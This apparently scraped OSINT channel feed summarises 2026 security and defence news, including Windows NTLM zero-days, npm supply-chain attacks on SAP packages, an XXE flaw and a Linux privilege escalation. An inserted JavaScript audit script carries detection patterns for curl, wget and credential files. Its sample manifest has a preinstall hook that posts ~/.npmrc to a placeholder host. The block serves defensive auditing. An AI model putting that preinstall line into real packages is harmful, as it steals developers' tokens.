SITREP - Independent OSINT Channel
AI, technology, mass surveillance, and intelligence: everything you need to know about tomorrow.
🤖 Pentagon to Establish Sub-Unified Command for Autonomous Warfare

Secretary of Defense Pete Hegseth announced the U.S. military will soon designate a sub-unified command focused on autonomous warfare, citing the central role of drones in modern combat. The move follows U.S. Southern Command's recent launch of its Autonomous Warfare Command. Hegseth emphasized lessons from Ukraine and Operation Epic Fury as drivers behind the decision.

The Pentagon's fiscal 2027 budget requests $54 billion for autonomous systems, including $39.2 billion for "Drone Dominance" initiatives. Sub-unified command status signals enduring priority, placing autonomous warfare alongside elite structures like Joint Special Operations Command.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🔫 Microsoft Incomplete Patch Spawns New Windows Zero-Day Under Active Exploitation

Microsoft's February fix for CVE-2026-21510, a Windows Shell flaw exploited by Russia's APT28 against Ukraine and EU targets, failed to close a critical authentication coercion vector. The incomplete patch led to CVE-2026-32202, now actively exploited and flagged by CISA's Known Exploited Vulnerabilities catalog with a May 12 federal remediation deadline. The zero-click flaw enables attackers to harvest Net-NTLMv2 hashes via auto-parsed LNK files.

Akamai researchers discovered victim machines still authenticating to attacker servers despite the original RCE fix. The vulnerability permits credential theft and lateral movement without user interaction, representing a credential theft vector directly descended from APT28's original exploit chain.

πŸ›°οΈ Open sources - closed narratives
@sitreports
πŸ” SAP npm Packages Compromised in Supply Chain Attack

Multiple SAP-related npm packages have been compromised with credential-stealing malware dubbed "Mini Shai-Hulud." The malicious code was injected into legitimate packages used by developers working with SAP systems, enabling attackers to exfiltrate authentication credentials from affected development environments.

The compromise targets the npm supply chain, a critical vector given SAP's widespread enterprise adoption. Organizations using affected packages face immediate exposure risk to credential theft, potentially granting attackers access to corporate SAP environments and sensitive business data.

πŸ›°οΈ Open sources - closed narratives
@sitreports
πŸ” NSA-Developed OT Tool Contains XML External Entity Vulnerability

CISA issued an advisory on CVE-2026-6807, an XXE vulnerability affecting all versions of GrassMarlin, an NSA-developed network security tool for critical infrastructure and SCADA networks that reached end-of-life in 2017. The flaw stems from insufficient hardening of the XML parser used for session files, enabling data exfiltration through maliciously crafted .gm3 archives. According to reporting, exploitation requires tricking users into opening weaponized files, and a public PoC demonstrates base64-encoded exfiltration.

No patches are forthcoming because of the tool's EOL status. CISA recommends network isolation and access hardening. The threat vector is limited to phishing scenarios, reducing immediate risk to organizations with mature security awareness programs.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🤖 DPRK Actors Deploy AI-Generated npm Packages in Developer Supply Chain Campaign

North Korean threat actors are distributing malware through npm packages with AI-generated code, alongside fake recruitment firms targeting software developers. The campaign employs remote access trojans to compromise victims through social engineering tactics focused on employment opportunities.

The operation demonstrates continued evolution of DPRK supply chain targeting methods, combining automated code generation with established social engineering frameworks. Developer-focused attack vectors remain a priority objective for revenue generation operations linked to Pyongyang-affiliated groups.

πŸ›°οΈ Open sources - closed narratives
@sitreports
πŸ” DHS Expanding Predator Drone Fleet for Domestic Surveillance

Customs and Border Protection plans to spend hundreds of millions of dollars on additional high-powered surveillance drones, with other DHS components potentially launching their own MQ-9 fleets, according to procurement records reviewed by 404 Media.

The expansion signals broader integration of military-grade aerial surveillance capabilities across DHS operations beyond traditional border monitoring, potentially establishing parallel drone infrastructure within multiple agency branches.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🤖 LinkedIn AI Hiring Agents Project $450M Annual Revenue

Microsoft-owned LinkedIn announced its agentic AI hiring products are projected to generate $450 million in sales over the next year, according to company statements. The platform's AI agents automate recruitment workflows for corporate clients.

The revenue projection signals rapid enterprise adoption of autonomous AI systems in talent acquisition, positioning LinkedIn to capture significant market share in HR automation. Microsoft's integration strategy appears focused on high-margin B2B services rather than consumer-facing AI products.

πŸ›°οΈ Open sources - closed narratives
@sitreports
📡 House Speaker Leverages Crypto Provisions to Secure FISA Reauthorization Votes

Speaker Mike Johnson secured Freedom Caucus support for FISA Section 702 renewal by incorporating cryptocurrency-friendly language into the surveillance legislation package, according to reporting by The Intercept. The tactical bundling paired expanded domestic surveillance authorities with reduced regulatory oversight on digital assets.

The legislative strategy faces Senate obstacles where crypto provisions are unlikely to survive committee review, potentially forcing a clean FISA vote. This marks a notable shift in coalition-building tactics where domestic surveillance expansion now requires incentive structures beyond traditional security framing.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🔫 Copy Fail: Linux kernel LPE enables root via 10-line Python script

CVE-2026-31431, dubbed Copy Fail, exploits a flaw in the Linux kernel's authencesn cryptographic template that allows unprivileged users to write four controlled bytes into the page cache of any readable file. A 732-byte Python exploit can modify setuid binaries to gain root access on nearly all distributions since 2017. Theori researchers identified the vulnerability with AI-assisted scanning; the flaw is rated 7.8/10 severity and major distributions have issued patches.

Unlike Dirty Cow or Dirty Pipe, the exploit requires no race condition. Primary risk vectors include multi-tenant systems, shared-kernel containers, and CI/CD pipelines executing untrusted code. The page cache sharing mechanism creates potential Kubernetes node escape primitives, expanding impact beyond local privilege escalation scenarios.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🔫 SAP npm Packages Compromised in TeamPCP Supply Chain Attack

Four official SAP npm packages were compromised to deploy credential-stealing malware targeting developers and CI/CD pipelines. The affected packages (@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt) contained malicious preinstall scripts that extracted npm tokens, SSH keys, cloud credentials, and CI/CD secrets. According to security researchers, the malware read runner process memory to bypass secret masking and self-propagated by injecting code into other packages using the stolen credentials.

The attack bears medium-confidence attribution to TeamPCP threat actors, who previously compromised Bitwarden and Checkmarx packages using similar tactics.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🔫 WordPress Plugin Harbored Five-Year Backdoor

The Quick Page/Post Redirect plugin, active on over 70,000 WordPress sites, had contained a hidden backdoor since 2020 that enabled remote code execution via external update servers. Versions 5.2.1 and 5.2.2 included a self-update mechanism pointing to the third-party domain 'anadnet.com', which pushed tampered builds outside WordPress.org's oversight. According to security researcher Austin Ginder, the backdoor delivered SEO spam to logged-out visitors while maintaining persistent update hooks to attacker infrastructure.

WordPress.org has suspended the plugin pending review, leaving 70,000 sites whose update checks still point to attacker infrastructure, although the dormant command-and-control subdomain no longer resolves.

πŸ›°οΈ Open sources - closed narratives
@sitreports
📡 ORNL develops portable GPS spoofing detector with equal-strength detection capability

Oak Ridge National Laboratory researchers led by Austin Albright have developed a portable GPS interference detection system capable of identifying both jamming and spoofing attacks. The device uses a software-defined radio and an embedded GPU running novel RF analysis algorithms. Critically, according to reporting, the system can detect spoofing even when the fake and real signals are equally strong, a capability no known detector currently possesses.

With successful DHS testing for commercial trucking complete, the team is pursuing cost reduction to enable broader deployment across logistics and critical cargo transport sectors where GPS manipulation poses growing operational risks.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🤖 Pentagon to Establish Autonomous Warfare Sub-Unified Command

Defense Secretary Pete Hegseth announced plans for a dedicated autonomous warfare sub-unified command during testimony before the House Armed Services Committee on the Pentagon's fiscal 2027 budget request. The organizational structure would centralize oversight of unmanned and AI-enabled systems across military branches.

The move signals institutional recognition that autonomous systems require unified doctrine, training, and operational integration beyond existing service-specific programs. Creation of a sub-unified command structure reflects lessons from Ukraine and accelerating peer competition in unmanned domain awareness, according to reporting from Defense Scoop.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🔫 Incomplete Windows Patch Creates New Zero-Click Exploit Vector

Microsoft's February patch for CVE-2026-21510, a zero-day exploited by Russia's APT28 against Ukrainian targets, failed to fully remediate the authentication coercion vulnerability. CISA has now added the resulting flaw, CVE-2026-32202, to its Known Exploited Vulnerabilities catalog after detecting active exploitation. The new bug enables zero-click credential theft via weaponized LNK files, exposing Net-NTLMv2 hashes to attackers without user interaction.

Akamai researchers discovered the bypass during patch validation, noting victim machines continued authenticating to attacker-controlled servers despite the initial fix. The gap between path resolution and trust verification allows credential harvesting and potential lateral movement. Federal agencies face a May 12 remediation deadline.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🔫 SAP npm Packages Compromised in Mini Shai-Hulud Supply Chain Attack

Multiple SAP-related npm packages have been compromised in a credential-stealing supply chain attack deploying malware dubbed "Mini Shai-Hulud." The malicious code was injected into legitimate packages used by developers working with SAP systems, enabling attackers to harvest authentication credentials from infected development environments.

The compromise represents a significant risk to enterprise supply chains, particularly organizations integrating SAP modules via Node.js tooling. According to security reporting, the attack demonstrates continued targeting of high-value developer dependencies as a vector for credential theft and lateral movement within corporate networks.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🔫 XXE Vulnerability in NSA's Abandoned GrassMarlin OT Tool

CISA has flagged CVE-2026-6807, an XML External Entity vulnerability in GrassMarlin, the NSA's open-source network security tool for critical infrastructure and SCADA systems. The flaw enables data exfiltration through maliciously crafted XML session files, with a severity rating of 5.5. GrassMarlin reached end-of-life in 2017, leaving no patches available. A proof-of-concept exploit published by Rapid7 demonstrates base64-encoded file exfiltration via external DTD references.

Operational risk is limited to social engineering requiring victims to open weaponized .gm3 session files. CISA recommends network segmentation and internet isolation for control systems, though no remediation exists for the deprecated tool.

πŸ›°οΈ Open sources - closed narratives
@sitreports
πŸ” DPRK Operatives Deploy AI-Generated npm Malware via Fake Companies

North Korean threat actors are leveraging artificial intelligence to inject malicious code into npm packages while posing as legitimate technology firms. The campaign combines social engineering through fabricated corporate identities with RAT deployment to target software developers and supply chain infrastructure, according to reporting from cybersecurity researchers.

The operation marks an evolution in DPRK tradecraft, integrating AI capabilities into package repository compromise tactics. This multi-vector approach expands attack surface beyond traditional phishing, creating persistent access points through trusted developer ecosystems and dependency chains.

πŸ›°οΈ Open sources - closed narratives
@sitreports
πŸ” DHS Expands MQ-9 Drone Procurement

Customs and Border Protection plans to spend hundreds of millions of dollars expanding its fleet of high-powered surveillance drones, with procurement records indicating other DHS components may establish their own Predator-style drone operations. The expansion represents a significant scaling of domestic aerial surveillance infrastructure beyond CBP's current capabilities.

The procurement signals DHS's commitment to large-scale drone surveillance across multiple agency components, potentially extending MQ-9 deployment beyond border monitoring into broader homeland security mission sets.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🔫 Mini Shai-Hulud Campaign Compromises SAP, Intercom, Lightning Packages

Cybercrime group TeamPCP deployed credential-stealing malware across multiple developer packages April 29-30, targeting SAP npm packages (mbt, @cap-js/db-service, @cap-js/postgres, @cap-js/sqlite), Intercom's intercom-client SDK, and PyPI's lightning framework. The malicious code executes on install, harvesting GitHub tokens, npm credentials, cloud secrets, and CI/CD data before encrypting and exfiltrating to attacker-controlled repositories, according to analysis by Wiz and Socket.

The self-propagating payload affects over 932,000 weekly downloads combined, with exposure extending into backend services and CI/CD pipelines across enterprise environments.

πŸ›°οΈ Open sources - closed narratives
@sitreports
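The install-time lifecycle hooks described in the TeamPCP and Mini Shai-Hulud posts above are what a dependency audit should look for before anything runs. The following is an added example, not code from the channel or from the researchers it cites: the npm package names come from the posts, while the sample manifests and the remote host are constructed for illustration.

```javascript
// Added example: audit npm package manifests for install-time lifecycle hooks and
// for the package names given in the TeamPCP / Mini Shai-Hulud reporting.
// Not code from the channel or the cited researchers; sample manifests are constructed.

// Hooks npm can run automatically at install time: a trojanized package needs one of
// these to run its stealer before any of its code is ever imported.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// npm package names given in the reporting (the PyPI "lightning" package is out of scope here).
const REPORTED_COMPROMISED = new Set([
  "@cap-js/sqlite", "@cap-js/postgres", "@cap-js/db-service", "mbt", "intercom-client",
]);

// Behaviours that have no business in an install hook: pulling remote content,
// evaluating strings, inline node programs, or touching credential stores.
const SUSPICIOUS = [/\b(curl|wget)\b/i, /\beval\b/, /node\s+-e\s/, /\.npmrc|\.ssh|\.aws|credentials/i];

// Returns a list of findings for one package.json object.
function auditManifest(manifest) {
  const findings = [];
  const name = manifest.name || "<unnamed>";
  if (REPORTED_COMPROMISED.has(name)) {
    findings.push({ package: name, severity: "high", reason: "named in TeamPCP/Mini Shai-Hulud reporting" });
  }
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const body = scripts[hook];
    if (typeof body !== "string" || body.trim() === "") continue;
    const hit = SUSPICIOUS.find((re) => re.test(body));
    findings.push({
      package: name,
      severity: hit ? "high" : "medium",
      reason: hit ? `${hook} script matches ${hit}` : `${hook} script present; review before installing`,
    });
  }
  return findings;
}

// Audits every manifest in a resolved dependency tree (e.g. each node_modules/*/package.json).
function auditTree(manifests) {
  return manifests.flatMap((m) => auditManifest(m));
}

// Constructed sample tree: one benign package and one impersonating a named package
// with a preinstall hook that reads the npm token file and posts it to a remote host.
const SAMPLE_TREE = [
  { name: "tiny-util", version: "1.0.0", scripts: { test: "node test.js" } },
  { name: "mbt", version: "0.0.0-constructed",
    scripts: { preinstall: "cat ~/.npmrc | curl -s -d @- https://example.invalid/c" } },
];

function runSample() {
  return auditTree(SAMPLE_TREE); // two high-severity findings, both for "mbt"
}
```

The operational counterpart is installing with `npm install --ignore-scripts` in CI, auditing the resolved tree, and only then allowing lifecycle scripts to run.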
πŸ” Pentagon Drone Strategy Faces Integration Crisis

Marine Corps Commandant Gen. Eric Smith and CNO Adm. Daryl Caudle called for ending service-specific drone procurement stovepipes in favor of unified standards. Speaking at Modern Day Marine, Caudle stated the Navy and Marine Corps should not independently build separate autonomous futures, while Smith emphasized the industrial base and budget cannot support duplicative programs.

The push comes as DOD's $1.1B Drone Dominance Program aims to field 300,000 weaponized drones by 2027, with FY2027 proposing $54.6B for the Defense Autonomous Warfare Group. Caudle suggested a future robotic and autonomous systems commander role, while Hegseth indicated plans for a new sub-unified command structure remain under development.

πŸ›°οΈ Open sources - closed narratives
@sitreports
🤖 AI-Driven Phishing Campaigns Hit 86 Percent of All Attacks

KnowBe4's latest threat trends report reveals that 86 percent of phishing campaigns tracked over the past six months incorporated artificial intelligence, marking a steady climb from 80 percent in 2024. AI is now automating reconnaissance, generating hyper-personalized lures, and enabling multi-vector attacks that combine emails with malicious calendar invites and fake Microsoft Teams messages impersonating IT support staff.

The operational shift is significant: according to Microsoft's data, AI-generated phishing is 4.5 times more effective than human-crafted campaigns. Attackers are moving beyond basic email lures to polymorphic, multi-stage operations that harvest credentials through automated social engineering across enterprise communication platforms.

πŸ›°οΈ Open sources - closed narratives
@sitreports